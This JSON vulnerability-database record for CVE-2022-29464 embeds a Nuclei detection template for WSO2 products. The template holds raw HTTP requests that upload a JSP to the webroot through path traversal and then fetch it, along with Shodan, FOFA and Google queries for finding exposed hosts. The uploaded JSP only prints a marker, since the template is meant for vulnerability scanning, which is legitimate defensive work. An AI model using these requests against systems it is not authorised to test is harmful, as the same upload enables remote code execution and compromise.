{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-29464/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-29464/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-29464/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-29464/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-29464/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-29464"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-29464"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-29464.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-29464\n\ninfo:\n  name: WSO2 Management - Arbitrary File Upload & Remote Code Execution\n  author: luci,dhiyaneshDk\n  severity: critical\n  description: |\n    Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to upload malicious files and execute arbitrary code on the affected system.\n  remediation: |\n    Apply the latest security patches and updates provided by WSO2 to mitigate this vulnerability.\n  reference:\n    - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/\n    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738\n    - https://github.com/hakivvi/CVE-2022-29464\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-29464\n    - http://www.openwall.com/lists/oss-security/2022/04/22/7\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-29464\n    cwe-id: CWE-22\n    epss-score: 0.99999\n    epss-percentile: 0.99994\n    cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: wso2\n    product: api_manager\n    shodan-query: http.favicon.hash:1398055326\n    fofa-query: icon_hash=1398055326\n    google-query: inurl:\"carbon/admin/login\"\n  tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /fileupload/toolsAny HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n        Content-Length: 348\n\n        -----------------------------250033711231076532771336998311\n        Content-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\n        Content-Type: application/octet-stream\n\n        <% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n        -----------------------------250033711231076532771336998311--\n      - |\n        GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(body_2, 'WSO2-RCE-CVE-2022-29464')\"\n# digest: 4a0a00473045022100a3ab3515584c61d472d440fbac4fff28f988eca5f918736e123d58710d3f2ae00220217f54c7e51a557d04594fec6e7173b8583168481811056c2b991c90a24f4170:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-29464"
}